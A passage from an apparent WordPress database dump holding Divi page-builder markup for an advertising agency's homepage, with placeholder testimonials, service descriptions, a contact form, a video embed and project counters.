by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:27:52','2020-08-05 07:27:52','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(423,1,'2020-08-05 07:28:16','2020-08-05 07:28:16','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" 